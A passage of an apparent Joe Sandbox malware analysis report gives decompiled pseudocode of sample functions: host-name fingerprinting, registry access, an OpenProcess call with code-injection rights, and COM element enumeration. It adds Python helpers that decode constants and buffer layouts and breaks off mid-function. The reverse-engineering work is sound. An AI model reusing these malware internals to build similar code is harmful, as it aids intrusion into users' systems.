                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                  • String ID:
                                                  • API String ID: 3850880919-0
                                                  • Opcode ID: 98128bcc13c53a0962b3320581ce83c1c4ffada82d0c4081394f1bc7e6d46878
                                                  • Instruction ID: 4ef1ff11a7cbb6647447a1471709f226bf05c95674d7740ae7a9f822bb51ccc1
                                                  • Opcode Fuzzy Hash: 98128bcc13c53a0962b3320581ce83c1c4ffada82d0c4081394f1bc7e6d46878
                                                  • Instruction Fuzzy Hash: 5121BDB6910209FBDB11DFE6D984CEEBBBCEE44345B5084AAE501E7241DB34AF44DB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
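E04B37649 assembles "<user>@<computer>" as a wide string in the upper part of one heap allocation, converts it to UTF-8 into the lower part, and returns the UTF-8 copy or NULL. The sizing is easy to misread: the allocation is four bytes per character, the wide scratch area starts at byte offset 2 * (u + c + 4), and the cbMultiByte passed to WideCharToMultiByte is 2 * L + 2 for an L-unit wide string. The added Python below (not code from the sample) mirrors that arithmetic with plain strings in place of the Windows calls, so it runs anywhere, and makes the consequence visible: names that need three UTF-8 bytes per character overflow the two-bytes-per-unit budget, the conversion fails and the function returns NULL. That budget is my reading of the decompiled expressions `_t56 + _t31` with `_t31 = _t56 + 2`; the page itself does not spell it out.

```python
def host_id_layout(user: str, computer: str) -> dict:
    """Mirror the buffer arithmetic of E04B37649 for a given user / computer name.

    Returns the wide string the sample assembles, the layout of its single heap
    allocation, the UTF-8 output, and whether cbMultiByte would hold it.
    """
    # the -W APIs count UTF-16 code units, so measure the names that way
    u = len(user.encode("utf-16-le")) // 2
    c = len(computer.encode("utf-16-le")) // 2
    # GetUserNameW(NULL,&n) reports u+1 (incl. NUL), GetComputerNameW(NULL,&n)
    # reports c+1; the sample then adds 2 more
    n_total = (u + 1) + (c + 1) + 2           # _v12 before the allocation
    alloc = n_total << 2                      # RtlAllocateHeap(_v12 << 2)
    wide_off = n_total * 2                    # _t66 = _t63 + _t47 * 2
    # the second GetUserNameW fills the wide area and returns u+1; '@' overwrites
    # its NUL and GetComputerNameW appends after it: u + 1 + c units, no NUL
    wide = f"{user}@{computer}"
    length = u + 1 + c                        # _t56 = _v12 + _v8
    cb_multibyte = length + (length + 2)      # _t56 + _t31, with _t31 = _t56 + 2
    utf8 = wide.encode("utf-8")               # WideCharToMultiByte(CP_UTF8, ...)
    fits = len(utf8) <= cb_multibyte          # otherwise the API fails -> NULL
    return {
        "wide": wide,
        "alloc": alloc,
        "wide_off": wide_off,
        "cb_multibyte": cb_multibyte,
        "utf8_len": len(utf8),
        "fits": fits,
        # on success the sample writes _t63[_t57] = 0 and returns the buffer
        "result": utf8 + b"\0" if fits else None,
        # UTF-8 output region [0, cb) and wide scratch [wide_off, wide_off + 2*length)
        # must not overlap and must stay inside the allocation
        "layout_ok": wide_off >= cb_multibyte and wide_off + 2 * length <= alloc,
    }


if __name__ == "__main__":
    # constructed sample names, not values taken from the analysis
    for user, computer in [("alice", "DESKTOP-1"), ("Иван", "ПК"), ("用户", "主机")]:
        r = host_id_layout(user, computer)
        print(f"{r['wide']!r}: alloc={r['alloc']} cb={r['cb_multibyte']} "
              f"utf8={r['utf8_len']} fits={r['fits']} result={r['result']!r}")
```

For an ASCII "alice@DESKTOP-1" the 15-byte result sits in a 72-byte allocation with the wide copy at offset 36; two-byte Cyrillic names still fit, while "用户@主机" needs 13 bytes against a 12-byte cbMultiByte and the identifier is never produced.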

                                                  C-Code - Quality: 58%
                                                  			E04B31585(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                                  				void* __esi;
                                                  				long _t10;
                                                  				void* _t18;
                                                  				void* _t22;
                                                  
                                                  				_t9 = __eax;
                                                  				_t22 = __eax;
                                                  				if(_a4 != 0 && E04B37F27(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                                                  					L9:
                                                  					return GetLastError();
                                                  				}
                                                  				_t10 = E04B3A9AB(_t9, _t18, _t22, _a8);
                                                  				if(_t10 == 0) {
                                                  					ResetEvent( *(_t22 + 0x1c));
                                                  					ResetEvent( *(_t22 + 0x20));
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push(0xffffffff);
                                                  					_push(0);
                                                  					_push( *((intOrPtr*)(_t22 + 0x18)));
                                                  					if( *0x4b3d130() != 0) {
                                                  						SetEvent( *(_t22 + 0x1c));
                                                  						goto L7;
                                                  					} else {
                                                  						_t10 = GetLastError();
                                                  						if(_t10 == 0x3e5) { // 997 = ERROR_IO_PENDING: asynchronous call still in flight, treated as success
                                                  							L7:
                                                  							_t10 = 0;
                                                  						}
                                                  					}
                                                  				}
                                                  				if(_t10 == 0xffffffff) {
                                                  					goto L9;
                                                  				}
                                                  				return _t10;
                                                  			}

                                                  APIs
                                                  • ResetEvent.KERNEL32(?,00000008,?,?,00000102,04B311DA,?,?,00000000,00000000), ref: 04B315BF
                                                  • ResetEvent.KERNEL32(?), ref: 04B315C4
                                                  • GetLastError.KERNEL32 ref: 04B315DC
                                                  • GetLastError.KERNEL32(?,?,00000102,04B311DA,?,?,00000000,00000000), ref: 04B315F7
                                                    • Part of subcall function 04B37F27: lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,04B315A4,?,?,?,?,00000102,04B311DA,?,?,00000000), ref: 04B37F33
                                                    • Part of subcall function 04B37F27: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04B315A4,?,?,?,?,00000102,04B311DA,?), ref: 04B37F91
                                                    • Part of subcall function 04B37F27: lstrcpy.KERNEL32(00000000,00000000), ref: 04B37FA1
                                                  • SetEvent.KERNEL32(?), ref: 04B315EA
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                                  • String ID:
                                                  • API String ID: 1449191863-0
                                                  • Opcode ID: 80f10b700e03918efe16ca4afc15d1410a418988c97075ccdfea7a99b7dd9c8f
                                                  • Instruction ID: ddfe6b589035a1b801d9303f4520be5f0590c234cd1461dcf2a2be55d6783fa3
                                                  • Opcode Fuzzy Hash: 80f10b700e03918efe16ca4afc15d1410a418988c97075ccdfea7a99b7dd9c8f
                                                  • Instruction Fuzzy Hash: 6A016272100651ABD7316F77DC44B1B7ABCFF44366F214A66F552A20E0DA30F8159621
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E04B38F10(intOrPtr _a4) {
                                                  				void* _t2;
                                                  				long _t4;
                                                  				void* _t5;
                                                  				long _t6;
                                                  				void* _t7;
                                                  				void* _t13;
                                                  
                                                  				_t2 = CreateEventA(0, 1, 0, 0); // manual-reset, initially non-signaled, unnamed
                                                  				 *0x4b3d26c = _t2;
                                                  				if(_t2 == 0) {
                                                  					return GetLastError();
                                                  				}
                                                  				_t4 = GetVersion();
                                                  				if(_t4 != 5) {
                                                  					L4:
                                                  					if(_t13 <= 0) {
                                                  						_t5 = 0x32; // 50 = ERROR_NOT_SUPPORTED
                                                  						return _t5;
                                                  					}
                                                  					L5:
                                                  					 *0x4b3d25c = _t4;
                                                  					_t6 = GetCurrentProcessId();
                                                  					 *0x4b3d258 = _t6;
                                                  					 *0x4b3d264 = _a4;
                                                  					_t7 = OpenProcess(0x10047a, 0, _t6); // SYNCHRONIZE | PROCESS_QUERY_INFORMATION | DUP_HANDLE | VM_WRITE | VM_READ | VM_OPERATION | CREATE_THREAD, on its own PID
                                                  					 *0x4b3d254 = _t7;
                                                  					if(_t7 == 0) {
                                                  						 *0x4b3d254 =  *0x4b3d254 | 0xffffffff; // fall back to INVALID_HANDLE_VALUE (-1)
                                                  					}
                                                  					return 0;
                                                  				}
                                                  				if(_t4 > 0) {
                                                  					goto L5;
                                                  				}
                                                  				_t13 = _t4 - _t4;
                                                  				goto L4;
                                                  			}

                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04B36A90,?,?,00000001,?,?,?,04B3807D,?), ref: 04B38F18
                                                  • GetVersion.KERNEL32(?,00000001,?,?,?,04B3807D,?), ref: 04B38F27
                                                  • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,04B3807D,?), ref: 04B38F3E
                                                  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,04B3807D,?), ref: 04B38F5B
                                                  • GetLastError.KERNEL32(?,00000001,?,?,?,04B3807D,?), ref: 04B38F7A
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                  • String ID:
                                                  • API String ID: 2270775618-0
                                                  • Opcode ID: 53d1083f6458bb6a3d2dd1b9f13651684070856b56726793167121095a0852ef
                                                  • Instruction ID: b9ed871130bc68401ff4f18bc7d69d830c7449cd0c0cb2d010358284cbfcc5a2
                                                  • Opcode Fuzzy Hash: 53d1083f6458bb6a3d2dd1b9f13651684070856b56726793167121095a0852ef
                                                  • Instruction Fuzzy Hash: 60F01971684341AAEB20AF77AD09B1C7BB6E744783F00495BF542DB1C0D6B8A841CA3A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 88%
                                                  			E04B317D5(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                                  				signed int _v8;
                                                  				char _v12;
                                                  				signed int* _v16;
                                                  				char _v284;
                                                  				void* __esi;
                                                  				char* _t60;
                                                  				intOrPtr* _t61;
                                                  				intOrPtr _t65;
                                                  				char _t68;
                                                  				intOrPtr _t72;
                                                  				intOrPtr _t73;
                                                  				intOrPtr _t75;
                                                  				void* _t78;
                                                  				void* _t88;
                                                  				void* _t97;
                                                  				void* _t98;
                                                  				char _t104;
                                                  				signed int* _t106;
                                                  				intOrPtr* _t107;
                                                  				void* _t108;
                                                  
                                                  				_t98 = __ecx;
                                                  				_v8 = _v8 & 0x00000000;
                                                  				_t104 = _a16;
                                                  				if(_t104 == 0) {
                                                  					__imp__( &_v284,  *0x4b3d33c);
                                                  					_t97 = 0x80000002;
                                                  					L6:
                                                  					_t60 = E04B3809F(0,  &_v284);
                                                  					_a8 = _t60;
                                                  					if(_t60 == 0) {
                                                  						_v8 = 8;
                                                  						L29:
                                                  						_t61 = _a20;
                                                  						if(_t61 != 0) {
                                                  							 *_t61 =  *_t61 + 1;
                                                  						}
                                                  						return _v8;
                                                  					}
                                                  					_t107 = _a24;
                                                  					if(E04B388B7(_t98, _t103, _t107, _t97, _t60) != 0) {
                                                  						L27:
                                                  						E04B39039(_a8);
                                                  						goto L29;
                                                  					}
                                                  					_t65 =  *0x4b3d27c; // 0x1fba5a8
                                                  					_t16 = _t65 + 0x4b3e8fe; // 0x65696c43
                                                  					_t68 = E04B3809F(0, _t16);
                                                  					_a24 = _t68;
                                                  					if(_t68 == 0) {
                                                  						L14:
                                                  						_t29 = _t107 + 0x14; // 0x102
                                                  						_t33 = _t107 + 0x10; // 0x3d04b3c0
                                                  						if(E04B3A635(_t103,  *_t33, _t97, _a8,  *0x4b3d334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
                                                  							_t72 =  *0x4b3d27c; // 0x1fba5a8
                                                  							if(_t104 == 0) {
                                                  								_t35 = _t72 + 0x4b3ea5f; // 0x4d4c4b48
                                                  								_t73 = _t35;
                                                  							} else {
                                                  								_t34 = _t72 + 0x4b3e89f; // 0x55434b48
                                                  								_t73 = _t34;
                                                  							}
                                                  							if(E04B3816C(_t73,  *0x4b3d334,  *0x4b3d338,  &_a24,  &_a16) == 0) {
                                                  								if(_t104 == 0) {
                                                  									_t75 =  *0x4b3d27c; // 0x1fba5a8
                                                  									_t44 = _t75 + 0x4b3e871; // 0x74666f53
                                                  									_t78 = E04B3809F(0, _t44);
                                                  									_t105 = _t78;
                                                  									if(_t78 == 0) {
                                                  										_v8 = 8;
                                                  									} else {
                                                  										_t47 = _t107 + 0x10; // 0x3d04b3c0
                                                  										E04B32659( *_t47, _t97, _a8,  *0x4b3d338, _a24);
                                                  										_t49 = _t107 + 0x10; // 0x3d04b3c0
                                                  										E04B32659( *_t49, _t97, _t105,  *0x4b3d330, _a16);
                                                  										E04B39039(_t105);
                                                  									}
                                                  								} else {
                                                  									_t40 = _t107 + 0x10; // 0x3d04b3c0
                                                  									E04B32659( *_t40, _t97, _a8,  *0x4b3d338, _a24);
                                                  									_t43 = _t107 + 0x10; // 0x3d04b3c0
                                                  									E04B32659( *_t43, _t97, _a8,  *0x4b3d330, _a16);
                                                  								}
                                                  								if( *_t107 != 0) {
                                                  									E04B39039(_a24);
                                                  								} else {
                                                  									 *_t107 = _a16;
                                                  								}
                                                  							}
                                                  						}
                                                  						goto L27;
                                                  					}
                                                  					_t21 = _t107 + 0x10; // 0x3d04b3c0
                                                  					if(E04B36BFA( *_t21, _t97, _a8, _t68,  &_v16,  &_v12) == 0) {
                                                  						_t106 = _v16;
                                                  						_t88 = 0x28;
                                                  						if(_v12 == _t88) {
                                                  							 *_t106 =  *_t106 & 0x00000000;
                                                  							_t26 = _t107 + 0x10; // 0x3d04b3c0
                                                  							E04B3A635(_t103,  *_t26, _t97, _a8, _a24, _t106);
                                                  						}
                                                  						E04B39039(_t106);
                                                  						_t104 = _a16;
                                                  					}
                                                  					E04B39039(_a24);
                                                  					goto L14;
                                                  				}
                                                  				if(_t104 <= 8 || _t104 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                                  					goto L29;
                                                  				} else {
                                                  					_t103 = _a8;
                                                  					E04B3A8D8(_t104, _a8,  &_v284);
                                                  					__imp__(_t108 + _t104 - 0x117,  *0x4b3d33c);
                                                  					 *((char*)(_t108 + _t104 - 0x118)) = 0x5c;
                                                  					_t97 = 0x80000003;
                                                  					goto L6;
                                                  				}
                                                  			}
                                                   Instruction addresses for the E04B317D5 listing (one address per decompiled line, detached from the code column by extraction): 0x04b317d5 to 0x04b31a00; entries of 0x00000000 correspond to the goto lines.

                                                  APIs
                                                  • StrChrA.SHLWAPI(04B33C81,0000005F,00000000,00000000,00000104), ref: 04B31808
                                                  • lstrcpy.KERNEL32(?,?), ref: 04B31835
                                                    • Part of subcall function 04B3809F: lstrlen.KERNEL32(?,00000000,04B3D330,00000001,04B32200,04B3D00C,04B3D00C,00000000,00000005,00000000,00000000,?,?,?,04B396C1,04B323E9), ref: 04B380A8
                                                    • Part of subcall function 04B3809F: mbstowcs.NTDLL ref: 04B380CF
                                                    • Part of subcall function 04B3809F: memset.NTDLL ref: 04B380E1
                                                    • Part of subcall function 04B32659: lstrlenW.KERNEL32(04B33C81,?,?,04B319A9,3D04B3C0,80000002,04B33C81,04B38B1E,74666F53,4D4C4B48,04B38B1E,?,3D04B3C0,80000002,04B33C81,?), ref: 04B32679
                                                    • Part of subcall function 04B39039: HeapFree.KERNEL32(00000000,00000000,04B37F18,00000000,?,?,00000000), ref: 04B39045
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 04B31857
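                                                   The decompiler prints the dword found at each computed address as a `// 0x...` comment (for example `// 0x4d4c4b48` next to `_t72 + 0x4b3ea5f` in E04B317D5), and the hive handle is chosen as a bare literal (`_t97 = 0x80000002` or `0x80000003`). Reading those by hand is error-prone: 0x80000003 is HKEY_USERS, not HKEY_CURRENT_USER, even though the label built beside it decodes to "HKCU". The OpenProcess call at the top of this block also passes a raw desired-access mask (0010047A). The script below is an added example, not part of the Joe Sandbox report or of the sample's code: it decodes such immediates as little-endian ASCII or UTF-16LE fragments, names the HKEY root constants, and expands the access mask into its rights. The input lines are constructed to mirror the listings above; the regexes, table names and the heuristic for wide-string fragments are this example's own assumptions.

```python
"""Decode immediates from a decompiled listing (added example, not report output)."""
import re
import struct

# Constructed input: lines in the shape of the E04B317D5 / E04B352F9 listings.
# The hex comments are the dword values the decompiler printed next to the
# address arithmetic, i.e. the bytes the sample reads at those locations.
SAMPLE_LISTING = """\
_t16 = _t65 + 0x4b3e8fe; // 0x65696c43
_t35 = _t72 + 0x4b3ea5f; // 0x4d4c4b48
_t34 = _t72 + 0x4b3e89f; // 0x55434b48
_t44 = _t75 + 0x4b3e871; // 0x74666f53
_t33 = _t78 + 0x4b3e078; // 0x76006f
_t65 = *0x4b3d27c; // 0x1fba5a8
_t97 = 0x80000002;
_t97 = 0x80000003;
"""

# Predefined registry root handles (winreg.h).
HKEY_ROOTS = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
    0x80000005: "HKEY_CURRENT_CONFIG",
}

# Process-specific access rights plus the standard rights (winnt.h).
PROCESS_RIGHTS = [
    (0x00000001, "PROCESS_TERMINATE"),
    (0x00000002, "PROCESS_CREATE_THREAD"),
    (0x00000008, "PROCESS_VM_OPERATION"),
    (0x00000010, "PROCESS_VM_READ"),
    (0x00000020, "PROCESS_VM_WRITE"),
    (0x00000040, "PROCESS_DUP_HANDLE"),
    (0x00000080, "PROCESS_CREATE_PROCESS"),
    (0x00000100, "PROCESS_SET_QUOTA"),
    (0x00000200, "PROCESS_SET_INFORMATION"),
    (0x00000400, "PROCESS_QUERY_INFORMATION"),
    (0x00000800, "PROCESS_SUSPEND_RESUME"),
    (0x00001000, "PROCESS_QUERY_LIMITED_INFORMATION"),
    (0x00010000, "DELETE"),
    (0x00020000, "READ_CONTROL"),
    (0x00040000, "WRITE_DAC"),
    (0x00080000, "WRITE_OWNER"),
    (0x00100000, "SYNCHRONIZE"),
]

COMMENT_RE = re.compile(r"//\s*(0x[0-9a-fA-F]{1,8})\b")       # decompiler value comment
ASSIGN_RE = re.compile(r"=\s*(0x8000000[0-9a-fA-F])\s*;")     # bare HKEY literal


def _printable(code: int) -> bool:
    return 0x20 <= code < 0x7F


def decode_dword(value: int):
    """Classify a 32-bit immediate as little-endian ASCII, UTF-16LE, or raw data."""
    raw = struct.pack("<I", value)
    if all(_printable(b) for b in raw):
        return ("ascii", raw.decode("ascii"))
    units = struct.unpack("<2H", raw)
    # Heuristic: "xy" or "x\0" is a wide-string fragment; a leading NUL is not.
    if units[0] != 0 and all(u == 0 or _printable(u) for u in units):
        return ("utf16", "".join(chr(u) for u in units if u))
    return ("raw", f"0x{value:08x}")


def decode_listing(listing: str):
    """Return (literal, kind, meaning) for every hex comment and HKEY assignment."""
    found = []
    for line in listing.splitlines():
        for m in COMMENT_RE.finditer(line):
            found.append((m.group(1),) + decode_dword(int(m.group(1), 16)))
        for m in ASSIGN_RE.finditer(line):
            value = int(m.group(1), 16)
            found.append((m.group(1), "hkey", HKEY_ROOTS.get(value, "unknown HKEY")))
    return found


def decode_access_mask(mask: int):
    """Expand an OpenProcess desired-access mask; unrecognised bits are kept visible."""
    names = [name for bit, name in PROCESS_RIGHTS if mask & bit]
    known = sum(bit for bit, _ in PROCESS_RIGHTS)
    leftover = mask & ~known & 0xFFFFFFFF
    if leftover:
        names.append(f"UNKNOWN(0x{leftover:08x})")
    return names


if __name__ == "__main__":
    for literal, kind, meaning in decode_listing(SAMPLE_LISTING):
        print(f"{literal:>12}  {kind:6}  {meaning}")
    print("OpenProcess(0x0010047A):", " | ".join(decode_access_mask(0x0010047A)))
```

                                                   Run against the constructed lines, the four ASCII fragments come out as "Clie", "HKLM", "HKCU" and "Soft", the wide fragment as "ov", and 0x1fba5a8 is flagged as raw data (it is the base pointer the function adds its offsets to). The access mask 0x0010047A expands to PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION and SYNCHRONIZE, which is the set of rights needed to write and execute code in the target process; the target here is the result of GetCurrentProcessId, so the handle is opened on the sample's own process.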
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                   • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
                                                   • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
                                                   • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
                                                   • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                  • String ID: \
                                                  • API String ID: 3924217599-2967466578
                                                  • Opcode ID: acfd8abb034c9db0c58ca0f70ae8eb8b7343f45a7c53f41a131132354d0c6368
                                                  • Instruction ID: a46844e1257eac8d0552eb94b07ce51df0307b3f71bfc11f5a167a9fe05364fe
                                                  • Opcode Fuzzy Hash: acfd8abb034c9db0c58ca0f70ae8eb8b7343f45a7c53f41a131132354d0c6368
                                                  • Instruction Fuzzy Hash: 7D516C76100209EFDF11AFA6CC40E9A37BEEF1830AF008596FA5593120D735ED269B20
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 46%
                                                  			E04B352F9(intOrPtr* __eax) {
                                                  				void* _v8;
                                                  				WCHAR* _v12;
                                                  				void* _v16;
                                                  				char _v20;
                                                  				void* _v24;
                                                  				intOrPtr _v28;
                                                  				void* _v32;
                                                  				intOrPtr _v40;
                                                  				short _v48;
                                                  				intOrPtr _v56;
                                                  				short _v64;
                                                  				intOrPtr* _t54;
                                                  				intOrPtr* _t56;
                                                  				intOrPtr _t57;
                                                  				intOrPtr* _t58;
                                                  				intOrPtr* _t60;
                                                  				void* _t61;
                                                  				intOrPtr* _t63;
                                                  				intOrPtr* _t65;
                                                  				intOrPtr* _t67;
                                                  				intOrPtr* _t69;
                                                  				intOrPtr* _t71;
                                                  				intOrPtr* _t74;
                                                  				intOrPtr* _t76;
                                                  				intOrPtr _t78;
                                                  				intOrPtr* _t82;
                                                  				intOrPtr* _t86;
                                                  				intOrPtr _t102;
                                                  				intOrPtr _t108;
                                                  				void* _t117;
                                                  				void* _t121;
                                                  				void* _t122;
                                                  				intOrPtr _t129;
                                                  
                                                  				_t122 = _t121 - 0x3c;
                                                  				_push( &_v8);
                                                  				_push(__eax);
                                                  				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
                                                  				if(_t117 >= 0) {
                                                  					_t54 = _v8;
                                                  					_t102 =  *0x4b3d27c; // 0x1fba5a8
                                                  					_t5 = _t102 + 0x4b3e038; // 0x3050f485
                                                  					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                                  					_t56 = _v8;
                                                  					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                                  					if(_t117 >= 0) {
                                                  						__imp__#2(0x4b3c2b0);
                                                  						_v28 = _t57;
                                                  						if(_t57 == 0) {
                                                  							_t117 = 0x8007000e;
                                                  						} else {
                                                  							_t60 = _v32;
                                                  							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                                  							_t86 = __imp__#6;
                                                  							_t117 = _t61;
                                                  							if(_t117 >= 0) {
                                                  								_t63 = _v24;
                                                  								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                                  								if(_t117 >= 0) {
                                                  									_t129 = _v20;
                                                  									if(_t129 != 0) {
                                                  										_v64 = 3;
                                                  										_v48 = 3;
                                                  										_v56 = 0;
                                                  										_v40 = 0;
                                                  										if(_t129 > 0) {
                                                  											while(1) {
                                                  												_t67 = _v24;
                                                  												asm("movsd");
                                                  												asm("movsd");
                                                  												asm("movsd");
                                                  												asm("movsd");
                                                  												_t122 = _t122;
                                                  												asm("movsd");
                                                  												asm("movsd");
                                                  												asm("movsd");
                                                  												asm("movsd");
                                                  												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
                                                  												if(_t117 < 0) {
                                                  													goto L16;
                                                  												}
                                                  												_t69 = _v8;
                                                  												_t108 =  *0x4b3d27c; // 0x1fba5a8
                                                  												_t28 = _t108 + 0x4b3e0bc; // 0x3050f1ff
                                                  												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
                                                  												if(_t117 >= 0) {
                                                  													_t74 = _v16;
                                                  													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
                                                  													if(_t117 >= 0 && _v12 != 0) {
                                                  														_t78 =  *0x4b3d27c; // 0x1fba5a8
                                                  														_t33 = _t78 + 0x4b3e078; // 0x76006f
                                                  														if(lstrcmpW(_v12, _t33) == 0) {
                                                  															_t82 = _v16;
                                                  															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
                                                  														}
                                                  														 *_t86(_v12);
                                                  													}
                                                  													_t76 = _v16;
                                                  													 *((intOrPtr*)( *_t76 + 8))(_t76);
                                                  												}
                                                  												_t71 = _v8;
                                                  												 *((intOrPtr*)( *_t71 + 8))(_t71);
                                                  												_v40 = _v40 + 1;
                                                  												if(_v40 < _v20) {
                                                  													continue;
                                                  												}
                                                  												goto L16;
                                                  											}
                                                  										}
                                                  									}
                                                  								}
                                                  								L16:
                                                  								_t65 = _v24;
                                                  								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                  							}
                                                  							 *_t86(_v28);
                                                  						}
                                                  						_t58 = _v32;
                                                  						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                                  					}
                                                  				}
                                                  				return _t117;
                                                  			}
                                                   Instruction addresses for the E04B352F9 listing (one address per decompiled line, detached from the code column by extraction): 0x04b352fe to 0x04b3548b; entries of 0x00000000 correspond to the goto and continue lines.

                                                  APIs
                                                  • SysAllocString.OLEAUT32(04B3C2B0), ref: 04B35349
                                                  • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04B3542B
                                                  • SysFreeString.OLEAUT32(00000000), ref: 04B35444
                                                  • SysFreeString.OLEAUT32(?), ref: 04B35473
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: String$Free$Alloclstrcmp
                                                  • String ID:
                                                  • API String ID: 1885612795-0
                                                  • Opcode ID: 877cb7d1ecd71df45d77503bb404566bfe5b7be4041a5238554caaf417be4517
                                                  • Instruction ID: dfaab2364e9efe158476027757f42e83826d75e24bec99eb6fd529f2b43c5790
                                                  • Opcode Fuzzy Hash: 877cb7d1ecd71df45d77503bb404566bfe5b7be4041a5238554caaf417be4517
                                                  • Instruction Fuzzy Hash: 53516D75D00519EFCB14DFE9C8888AEB7BAEF88706B148589E915EB314D731AD01CFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 85%
                                                  			E04B31017(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _v12;
                                                  				signed int _v16;
                                                  				void _v92;
                                                  				void _v236;
                                                  				void* _t55;
                                                  				unsigned int _t56;
                                                  				signed int _t66;
                                                  				signed int _t74;
                                                  				void* _t76;
                                                  				signed int _t79;
                                                  				void* _t81;
                                                  				void* _t92;
                                                  				void* _t96;
                                                  				signed int* _t99;
                                                  				signed int _t101;
                                                  				signed int _t103;
                                                  				void* _t107;
                                                  
                                                  				_t92 = _a12;
                                                  				_t101 = __eax;
                                                  				_t55 = E04B3A7AA(_a16, _t92); /* _t79: limb count of the divisor _a12 (likely); zero means nothing to divide by */
                                                  				_t79 = _t55;
                                                  				if(_t79 == 0) {
                                                  					L18:
                                                  					return _t55;
                                                  				}
                                                  				_t56 =  *(_t92 + _t79 * 4 - 4); /* top limb of the divisor; its significant bits are counted by the 0x20-bounded loop at the end */
                                                  				_t81 = 0;
                                                  				_t96 = 0x20;
                                                  				if(_t56 == 0) {
                                                  					L4:
